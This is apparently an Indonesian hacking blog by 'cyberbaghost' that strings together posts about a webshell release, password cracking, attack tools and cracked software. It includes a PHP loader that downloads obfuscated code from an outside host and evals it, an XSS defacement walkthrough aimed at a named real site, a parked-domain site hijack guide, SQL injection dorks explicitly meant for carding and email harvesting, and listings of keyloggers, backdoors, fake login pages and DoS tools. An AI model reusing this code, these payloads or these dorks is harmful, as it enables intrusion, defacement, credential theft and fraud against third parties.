cyberbaghost V1.2 1kb

Setelah merilis cyberbaghost shell yang versi awal sekarang cyberbaghost merilis kembali shell versi terbarunya :D
ada penambahan fitur Paypal Checker Manu WHM Exploiter  versi cyberbagost
serta desain yang lebih menarik dibandingkan versi awalnya yaitu pemberian efek animasi pada kursor dan backgroundnya yang istimewah yang membedakan dengan shell lainnya adalah ada soundtrack musiknya dijamin anda tidak akan menemukan dishell lain cyberbaghost yang pertama menemukan ide tersebut :)
perincian fitur:

Shell Eval Mysql Database Dump Php Info Net Sploit Upload E-Mail Port Scan Ddos Tools Symlink Config Bypass Domain Joomla Server Scanner Joomla IndChange

Wordpress ResPass Joomla ResPass WHMCS Decoder WHM EXPLOIT Zone-H Mass Deface Wordpress BruteForce Cpanel BruteForce Bypass CloudFlare

Paypal Checker Private Dork Scaner SQLI SQLI EXPLOIT Admin Finder Password Hash Hash ID Script Encode Website Whois About Log-Out

 

ukuran 1kb

 

 <?php
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$text = file_get_contents('http://gfisecwebtool.besaba.com/cyberbaghostshell1.2.txt');
@eval(str_rot13(gzinflate(str_rot13(base64_decode(($text))))));
?>

cara mengganti nama akun fb terbaru 2014

Selamat malam semua.. maaf ane baru bisa update blog ini karena jaringan yang kurang mendukung akhir-akhir ini.

Di sini ane akan menjelaskan cara ganti nama akun facebook yang udah limit dan cara ini work 100%.

Pasti diantara kalian ada yang pengen ganti nama akun dengan nama yang lain tapi tidak bisa karena sudah limit. Dan pastinya bingung nyari solusi dimana-mana (kebanyakan gak work).

Tapi tenang aja, kalian sudah masuk di blog yang tepat untuk mengetahui cara mengganti nama akun yang paling mujarab dan pastinya bikin kita senang karena nama akun kita bisa di ganti berapa kalipun kita mau ^_^.

Nah, ane akan mulai menjelaskan caranya, silahkan di simak baik-baik ok ...

1.  masuk ke pengaturan akun
2. Langsung ke pengaturan Umum
3. Ganti Bahasa yang di pakai sekarang ke bahasa yang lain (contoh English)
4. Sekarang ganti nama/Nick ente
5. Kalau sudah, Ganti lagi bahasanya ke bahasa yang semula.
6. Selesai, silahkan di lihat nama Fb kalian... berhasil kan. Saatnya bilang "SEMPURNAAAA"....

Nah, itu cara ganti akaun yang paling mujarab di tahun 2014 ini dan pastinya work 100%. Maaf, gak ada ScreenShot -_-.

Walaupun singkat tapi padat Bung ^_^. 

Silahkan di coba.. Jangan lupa komentarnya Mas bro :D

Sekian dulu Postingan ane kali ini, semoga bermanfaat untuk kalian semua. 

Wassalam.....

Password Cracking dengan John The Ripper (JTR)

Ok pada kesempatan ini saya cyberbaghost akan sedikit mengupas tentang si Paman John The Ripper (JTR) sang penyelamat dunia. xixixixi :p
JTR merupakan sebuah aplikasi untuk melakukan password cracking. Aplikasi ini dapat berjalan pada platform *NIX, dan WIN. Bagi yang belum mempunyai Aplikasi ini dapat didowload http://www.openwall.com/john/
Aplikasi ini sangat populer, siapa sih yang gak kenal sama paman si JOHN :D. Aplikasi ini sangat membantu bagi seseorang yang biasanya melakukan teknik SQL Injection, Dll karena biasanya password yang ditemukan itu di enkrypt oleh si Admin. apalagi ketika http://www.md5decrypter.co.uk tidak dapat memecahkannya. si JTR lah yang akan berperan disini :
Ok, Langsung saja ke Tekniknya :
1. MD5 Hash
– Contoh MD5 Hash
21232f297a57a5a743894a0e4a801fc3
827ccb0eea8a706c4c34a16891f84e7b
Untuk melakukan Crack
Save MD5 Hash kedalam sebuah file dengan seperti ini

1:21232f297a57a5a743894a0e4a801fc3
2:827ccb0eea8a706c4c34a16891f84e7b

root@th3_w1tch:/pentest/passwords/jtr# ./john -format=raw-md5 pass.txt
12345 (2)
admin (1)
guesses: 2 time: 0:00:00:00 100.00% (2)

Menggunakan Wordlist

root@th3_w1tch:/pentest/passwords/jtr# ./john –wordlist=/data/dict.txt -format=raw-md5 pass.txt

Menggunakan Type Password :
alpha : karakter huruf
digit : karakter angka
alnum : huruf dan angka
all : mencoba semua karakter

root@th3_w1tch:/pentest/passwords/jtr#./john –incremental=alnum –format=raw-md5 pass.txt

2. MD4 Hash

root@th3_w1tch:/pentest/passwords/jtr# ./john -format=raw-md4 pass.txt

3. SHA1 Hash

root@th3_w1tch:/pentest/passwords/jtr# ./john -format=raw-sha1 pass.txt

4. MD5 Jomla Hash
Klw ini sedikit berbeda, karena password joomla memiliki algorima seperti
md5([passwordasli]+[salt]) hasilnya akan seperti ini f9c63438a5fececf0d99355394024f3c:YpSmHvK6ut2306WsORjw3bKAmHKH4eT6
Contoh Joomla Hash
f9c63438a5fececf0d99355394024f3c:YpSmHvK6ut2306WsORjw3bKAmHKH4eT6
Cara Crack :
Save Hashnya seperti ini dalam sebuah file

1:md5_gen(1)f9c63438a5fececf0d99355394024f3c$YpSmHvK6ut2306WsORjw3bKAmHKH4eT6

perhatikan pada saat melakukan save “ : ” diganti menjadi “$“, md5$salt

root@th3_w1tch:/pentest/passwords/jtr#./john –subformat=md5_gen\(1\) pass.txt
Loaded 1 password hash ( md5_gen(1): md5($p.$s) (joomla) [md5-gen SSE2 16x4])
ddddda (1)
guesses: 1 time: 0:00:00:02 (3)

5. WordPress Phpass Hash
contoh Hashnya
$P$937lj8T3rci18KkTykssJJWHrtsVtb/
cara crack :
Save hash diatas dalam sebuah file seperti ini

1:$P$937lj8T3rci18KkTykssJJWHrtsVtb/

root@th3_w1tch:/pentest/passwords/jtr#./john –subformat=md5_gen\(17\) pass.txt

Ok Sekian dulu, Klw Kurang Jelas Silahkan Komennya :D, Semoga bermanfaat

Kerinci tools 0.9 tool pentester

kini saya memberikan tools pentester yang difungsikan khusus untuk memberi tahukan sebuah celah web dan juga memberikan akses inject sesuai wordlist yang tergabung di dalam software ini, sebut saja software ini dikenal dengan sapaan kerinci,
kerinci sendiri merupakan tools yang sejak dahulu kala para maniak pentester menggunakannya untuk mengetahui celah web mereka sendiri, tetapi apa di kata ketika tool kecil ini disebar luaskan di seluruh dunia, maka hasilnya bisa positif dan juga negatif, ya postifnya bisa memberikan wawasan lebih banyak mengenai web dan celahnya, lalu tidak untuk diretas, hanya untuk belajar memperbaikinya, dan negatifnya, ketika seseorang berhasil memecahkan celahnya, maka dia bisa meretas situs target yang dia inginkan bisa di kendalikan sesuka hatinya, jadi pamer sebuah script dan beraneka macam model bahasa html program web yang mereka buat, lalu di dunia maya diberi nama, Deface show off yang artinya memamerkan hasil atau karya web yang diretas oleh orang - orang yang sedikit bertanggung jawab atas hal ini. Baiklah, semoga para pembaca tidak menyalah gunakan software ini. Ini hanya untuk pembelajaran semata, bukan untuk disalah gunakan. cyberbaghost tidak bertanggung jawab atas penyalah gunaan tools ini. Selebihnya tanggung jawab ada di tangan pengguna. Beberapa gambar atau sebuah perubahan yang saya perbuat dengan software ini. Anda bisa mellihatnya dibawah ini :

Instalasi mode :

Diperkaya dengan mode installer, agar pengguna lebih mudah dalam
melakukan instalasi software kerinci tools 0.9 ini.

Nah cukup itu saja pertunjukkan dari saya, semoga software ini sangat bermanfaat untuk anda semua, Kerinci tools 0.9 Easly Installation. jika anda berminat, maka link unduh dapat anda temukan dibawah ini:
Disinikini saya memberikan tools pentester yang difungsikan khusus untuk memberi tahukan sebuah celah web dan juga memberikan akses inject sesuai wordlist yang tergabung di dalam software ini, sebut saja software ini dikenal dengan sapaan kerinci,
kerinci sendiri merupakan tools yang sejak dahulu kala para maniak pentester menggunakannya untuk mengetahui celah web mereka sendiri, tetapi apa di kata ketika tool kecil ini disebar luaskan di seluruh dunia, maka hasilnya bisa positif dan juga negatif, ya postifnya bisa memberikan wawasan lebih banyak mengenai web dan celahnya, lalu tidak untuk diretas, hanya untuk belajar memperbaikinya, dan negatifnya, ketika seseorang berhasil memecahkan celahnya, maka dia bisa meretas situs target yang dia inginkan bisa di kendalikan sesuka hatinya, jadi pamer sebuah script dan beraneka macam model bahasa html program web yang mereka buat, lalu di dunia maya diberi nama, Deface show off yang artinya memamerkan hasil atau karya web yang diretas oleh orang - orang yang sedikit bertanggung jawab atas hal ini. Baiklah, semoga para pembaca tidak menyalah gunakan software ini. Ini hanya untuk pembelajaran semata, bukan untuk disalah gunakan. cyberbaghost tidak bertanggung jawab atas penyalah gunaan tools ini. Selebihnya tanggung jawab ada di tangan pengguna. Beberapa gambar atau sebuah perubahan yang saya perbuat dengan software ini. Anda bisa mellihatnya dibawah ini :

Instalasi mode :

Diperkaya dengan mode installer, agar pengguna lebih mudah dalam
melakukan instalasi software kerinci tools 0.9 ini.

Nah cukup itu saja pertunjukkan dari saya, semoga software ini sangat bermanfaat untuk anda semua, Kerinci tools 0.9 Easly Installation. jika anda berminat, maka link unduh dapat anda temukan dibawah ini:
Disini
*cyberbaghost aka bagus w crew

Mengatasi Masalah Lupa Password User di Windows 7

Jika Anda melupakan password user pada komputer, maka akan menjadi masalah yang serius bagi anda jika pada komputernya terdapat data-data penting. Mungkin setiap Sistem Operasi memiliki cara-cara yang berbeda untuk memulihkanya. 

Khusus bagi pengguna Windows 7, saya akan memberi salah satu cara mengatasi lupa password user ini. Anda beruntung jika sebelum melupakan password user telah membuat Password Reset Disk. Karena Password Reset Disk ini dapat memulihkan Sistem Operasi Windows 7 dan mungkin Windows versi lainya yang Password User-nya telah dilupakan oleh pemiliknya sendiri.



Cara yang akan saya bagikan kali ini mengharuskan anda untuk Membuat Password Reset Disk Sebelum Lupa Password di Windows 7. Karena jika anda belum membuat Password Reset Disk tersebut, maka jangan harap Windows 7 yang anda lupakan password user-nya dapat dipulihkan dengan cara ini. Mungkin anda harus mencari cara lain untuk memulihkanya. Atau jalan terakhir ya instal ulang dengan resiko data-data penting yang terdapat pada partisi C atau partisi tempat menyimpan sistem operasi, akan terformat atau terhapus seluruhnya.


Seperti yang telah dijelaskan sebelumnya bahwa password reset disk ini bekerja dengan mereset atau membuat ulang password baru. Maka jika anda melupakan password user, anda dapat meminta untuk membuat ulang password baru dengan password reset disk yang menyimpan password lama, sebagai bukti bahwa anda adalah pemilik PC atau salah satu user pada SO Windows 7. Oh iya, password reset disk ini hanya dapat digunakan pada satu user, dengan kata lain tidak akan bisa memulihkan user lain apalagi SO Windows pada perangkat lain.


OK, kita mulai saja pada pokok pembahasan yaitu Cara Memulihkan Windows 7 yang telah dilupakan password user-nya.


1. Masukan Flashdisk yang di dalamnya terdapat file password reset disk yaitu userkey.psw ke USB port.
2. Pada halaman tempat kita login, inputkan saja tulisan apa pun dan biarkan terjadi kesalahan. Maka, akan tampil peringatan seperti berikut, klik saja OK.

3. Kita akan kembali ke halaman tempat kita login. Namun kali ini akan terdapat tulisan Reset Password. Klik tulisan tersebut.

4. Akan muncul Password Reset Wizard. Klik saja next.

5. Selanjutnya pilih Falshdisk yang di dalamnya terdapat file password reset disk yaitu userkey.psw.

6. Maka akan terdeteksi bahwa kita benar-benar salah satu user pada SO Windows 7. Buat password baru dan klik next.

7. Selanjutnya akan muncul keterangan "You've successfull reset password for this user account" tanda anda telah berhasil membuat ulang password baru.

8. Silakan login dengan password yang baru anda buat ulang.

Maka anda telah dapat login dan mengakses kembali komputer anda.

Dengan ini anda telah berhasil Mengatasi Masalah Lupa Password User di Windows 7. Selamat sob, semoga kedepanya kita tidak pernah melupakan password apa pun, hehe.

ebook tutorial sqli manual

tutor ini dari mas 1n73ct :)
search engine hacking

https://www.4shared.com/office/MF0uq7lc/...x1n73.html


sql injection manual ( basic )

https://www.4shared.com/office/MK_NvJnh/...ckbar.html


sql injection manual ( bypass illegal mix )

https://www.4shared.com/office/_IDvioFW/..._coll.html


sql injection manual ( bypass WAF )

https://www.4shared.com/office/Yab5zq5t/...by_x1.html


sql injection PHP version 4

https://www.4shared.com/office/xrITetV-/..._4_by.html


xpath injection

http://www.4shared.com/office/lYMQ2ca6/X...n73ct.html


mssql injection in web unesco
http://www.4shared.com/office/YGiJL1xH/m...nesco.html


fast sql injection in web lapan

http://www.4shared.com/office/s2CNzbuE/F...n__in.html
*cyberbaghost aka bagus w crew

Deface Website Menggunakan Teknik XSS Vulnerability

Wah pada mau baca ya? iya pastinya buat apa buka link blog saya kalau ga mau baca masa mau mangkal wkwkwkwkw. Oke stop tertawa saya Kang Mas Raden Dono Sardono alias cyberbaghost si Hensem unyu-unyu  akan sedikit memberikan ilmu. Sekarang saya akan sempatkan membahas tentang Cyber Gravity lagi nih... yaitu Cara Deface Website Menggunakan Teknik XSS Vulnerability.

Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !

1). Pertama, Masukan Dorknya :

inurl:"/showcatrows.php?CategoryID="

2). Kalo sudah, Pilih salah satu web yang akan kita deface.

Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13

3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.

Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Dono</h1></marquee>

4). Kemudian tekan Enter.

5). Selesai, Website sudah berhasil kita deface :D

Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.

Sekian tutorial deface website kali ini dari saya, semoga artikel tentang Cara Deface Website Menggunakan Teknik XSS Vulnerability ini dapat bermanfaat bagi sobat.

 

Ingat ya ilmu itu berguna tergantung anda menggunakannya  

*cyberbaghost aka bagus w crew

Xcode galaxy terbaru

my name is khan eh ._. my name is cyberbaghost :) i jus wan sering xD










X-code galaxy adalah program untuk mendukung penetration testing, pengawasan, keamanan, sekaligus juga untuk belajar dengan berbagai referensi yang lengkap.

X-code Galaxy memberkan kemudahan untuk download program-program untuk hacking, pengawasan dan pengamanannya. selain itu juga ada fitur chatting, anda dapat berkomunikasi dengan teman-teman X-code melalui program ini yang langsung mengarah ke Media X-code.

Dalam tutorial dasar untuk sebagian tool juga ada di X-code Galaxy. Selain tutorial juga disediakan referensi dari berbagai sumber.

Dalam hal Support, X-code Galaxy memberikan layanan support secara gratis, dimana memberikan form jika anda menemukan link download yang tidak dapat digunakan pada program.
isinya antara lain:

Distro product X-code dengan licensi GPL :
- Distro Linux X-code v0.0.1
- Distro Linux X-code v0.0.2
- Distro Linux X-code v0.0.2b
Majalah elektronik X-code product X-code :
- X-code Magazine No 1 – 22 (sejak 2006)
Hacking tools produk X-code :
- Kraken X-code (Keylogger X-code yang bisa dikirim lognya)
- Xremote : Backdoor atau trojan untuk WIndows yang powerful
- Xcode BOT : BOT yang mendukung DoS
- Xcode SQLi/LFI/XSS Vulnerability Webshell Scanner
- Digital Blaster : DoS tool
- CerewetClicker – Facebook Flooder
- Keylogger Yogyafree
- MobXcode
- Xalp Finder
- John Hydra of Yogyafree
- John of Yogyafree
- X-code MD5 Cracker
Security Tools produk X-code :
- Beetrap
- Antivirus Yogyafree
- YF-Crypt
- YF Key in My Flash Drive 2.0 (BARU)
Produk-produk X-code lainnya :
- Underground Chat
- X-code Pest Fuzzer
- Pak Guru
- X-code Galaxy mobile for JAVA
- Lain-lain seperti wallpaper, skin, dst
Modul XPT
Attack and defense :
Basic Tutorial
- Command prompt
- Shell bash
Reconnaissance
- Maltego
- VisualRoute
- TraceRoute
Scanning :
- NMAP
- Angry IP Scanner
- Webcruiser
- Nikto
- Wikto
- Acunetix
Sniffing :
- Maltego
- NetworkMiner
- Wireshark
- Windump
ARP Spoofing & DNS Spoofing :
- Cain & Able
- Ettercap
Exploits :
- Metasploit Framework
- Exploit-db exploits
- Exploit lainnya
Web Exploits :
- Google Dork
- WordPress Exploits (Support password crack)
- Login Logger WordPress
- Joomla Exploits
- Login Logger Joomla
- phpBB Exploits
- Login Logger phpBB
- Drupal Exploits
- Virtuemart Exploits
- OScommerce Exploits
- Aura Exploits
- VBulletin Exploits
- PHPMyadmin Exploits
- PHPNuke Exploits
- Front Accounting Exploits
Brute Force :
- Hydra for Windows
- Tutorial hydra
- Dictionary file [Bahasan Indonesia]
- Dictionary file [Bahasan Inggris]
Shell exploitation
Windows
- Copy file
- Telnet backdoor
- Connect back dan tutorialnya
- Password exploitation [IE, Firefox, chrome]
- Hosts exploitation
- PWDUMP & John The Ripper
- Admin Windows exploitation
- Trojan r3c
Linux
- PSYBNC
- Vadim
- Ngeroot Linux (Update, banyak)
- tutorial
SQL Injection :
- Havij
- SQLMAP dan tutorialnya
- Schemafuzz
Social Enginnering tools :
- Ardamax keylogger
- Istealer 6.3
- Fake login Facebook
- Fake login Twitter
- Fake login Gmail
- Fakelogin  Yahoo mail
PHP Shell Injector :
- R57
- C99
- C100
- B374k (Support link tool MD5 Encription)
- Hidden Upload
WIFI Hacking :
- Commview
- Aircrack
- Elcomsoft Wireless Security Auditor
DoS Tools :
- Netcut
- WINARPAttacker
- SMBDie
- Loic-Java
Hide now
- Platinum hide IP
- TOR
- Anonymous browsing
Target :
- Metasploitable
Tunneling
- HTTP Tunneling
- ICMP Tunneling
Computer Forensics :
- OS Forensics
- Forensics Toolkit
Analisa Malware :
- Process Monitor
- Regshot
- CaptureBAT
- OllyDbg
- Immunity Debugger + Mona.py
Instrusion Detection System
- Snort
- decaffeinatid
Security Tools :
- ARP Freeze
- OSFuscate
- Antivirus ANTIVIR
- ANTI NETCUT III
- Firewall Comodo
Support Tools :
- Mac Address Changer
- ActivePerl
- ActivePython
- LCC
- Netcat
- Putty
- Cygwin
- VirtualBox
- Aplikasi Server supports
ISO CD YF :
- CD Yogyafree Raider v1.0
- CD Yogyafree Express v11.0 x2
- CD Yogyafree Raider III
- CD YF Raider
Backtrack :
- Backtrack 5 R3 KDE 32bit
- Backtrack 5 R3 GNOME 32bit
- Backtrack 5 R3 KDE 64bit
- Backtrack 5 R3 GNOME 64bit
Kali-linux
Tools Lainnya :
- Zhider
- Zeus
- Yahoo Messenger password stealer
- wTembak
- Anti Deepfreeze 7
- KaHT
- KiTrap0D
- Unhide Passwords
- Etherflood
- FUDenkripter
- Yersinia-0.7
- Connect back
- Webcam Backdoor
- KiTrap0D
- Schemafuzz
- Unhide password
- ThumbSuck
- Process Monitor
- dst
Referensi
- Berbagai ezine dan artikel
Fitur-fitur lain :
- Konsultasi via chat [Puluhan konsultan X-code dengan berbagai spesialis]
- Friends X-code Mobile [Jejaring sosial hacker]
- Shoutbox X-code – Baru
- Chat X-code [Room X-code Chat]
- Video-video Yogyafree X-code
- Fitur musik
- Chat dengan Staff X-code
- Chat dengan Online Support
- Form untuk menginformasikan jika ada bug di X-code Galax
Bisa di download di  http://galaxy.xcode.or.id/Downloads.html
*cyberbaghost aka bagus w crew

cPanel Cracker V4

Buat para pemberburu cpanel ente bisa coba ini :) walaupun ane lebih suka pake uler phyton wkwkwkw xD. Tapi ente bisa coba :0 . Penjelasan dikit ye '.')/ Tool ini gunanye buat cracking cpanel (ya iyalah di judul juga udah jelas -___- ) dengan metode bruteforce. Tinggal ente masukin aje alamat websitenya. Usernya apa kira-kira aje misal admin, administrator, atau pakai nama websitenya, nama adminnya atau bisa juga simpan nama usernya dalam 1 list txt dan passwordnya dalam 1 list txt tinggal klik aja Start biarkan tool ini bekerja sendiri.
Features :     
Multi-Threading   
Customized   
dll
download
*cyberbaghost aka bagus w crew

Cara Crack IDM version 6.19 build 7 (Terbaru)

Hallo om '.')/ biasah tau kan siapa ane :) orang paling ganteng seindonesia xD wkwkwkwk. Ane mau buat tutor nih gimana cara crack IDM. Pengentahu apa pengentempe aja ?wkwkwkw
1 - Close/uninstall previous version of IDM
2 - Install version 6.19 build 7
3 - Copy IDMan.exe in ''Crack'' folder and past (replace) it in orginial installed folder (normally C:\Program Files\Internet Download Manager)
4 - Run reg file
Download
*cyberbaghost aka bagus w crew

Tutorial Parked Domain for Free Hosting

Titip nama: Majene Cyber

Pada kesempatan kali ini, saya akan share cara defacing Web yang menggunakan Hosting gratis (anakan dari youhosting.com). Sebagai contoh saya fokus dengan website yang menggunakan hosting idhostinger. Ok langsung saya.

1.                   Pertama-tama, saya menganggap kalian sudah mempunyai akun idhostinger.

2.                   Buka google, lalu masukin dork: ns1.idhostinger.com

3.                   Buka yang saya udah tandain (dailychanges)

4.                   Pilih salah satu Web yang mau tanam script defacing

5.                   Sebagai contoh saya pilih suryapatria-shop.com (target)

6.                   Login akun idhostinger kamu, trus buat subdomain terserah tetapi isi index.html adalah script deface kamu. Contoh punya saya.

7.                   Tambahkan file index.html lalu masukkan script deface.

8.                   Lalu, masuk ke menu “Parkir Domain pada idHostinger”

9.                   Tambahkan sub-domain, dan domain yang ingin ditanamin shell deface. Contoh :

10.               Selesai, silahkan buka parkirannya, jangan lupa bayar uang parkirnya, nama ane “Majene Cyber”.

Note : tutor ini hanya menambahkan sub-domain, jadi jangan iseng buat nambahin sub-domain ke web ane soalnya web ane rata2 pake idhostinger.

Dork power full sqli

 

SQLI adalah salah satu teknik hacking website, melalui celah SQL. Biasanya Para hacker (bukan ane) memanfaat dork untuk mencari. Langsung aja ane kasih dork buat nyari server yang vulnerable sama sql injection.

Code:

"you have an error in your sql syntax" inurl:/details.php?id=

Code:

"you have an error in your sql syntax" inurl:/events.php?id=

Code:

"you have an error in your sql syntax" inurl:/articles.php?id=

Code:

"you have an error in your sql syntax" inurl:/artist.php?id=

Code:

"you have an error in your sql syntax" inurl:/viewarticle.php?id=

Ni yang buat carding:

Code:

"you have an error in your sql syntax" inurl:/products.php?id=

Code:

"you have an error in your sql syntax" inurl:/price.php?id=

Code:

"you have an error in your sql syntax" inurl:/buy.php?id=

Code:

"you have an error in your sql syntax" inurl:/cart.php?id=

Buat nyari email, biasanya saya pake ini:

Code:

"you have an error in your sql syntax" inurl:/member.php?id=

Code:

"you have an error in your sql syntax" inurl:/comments.php?id=

 

*dork bisa dikembangkan so kembangkan sendiri se kreatif mungkin 

#cyberbaghost aka bagus w crew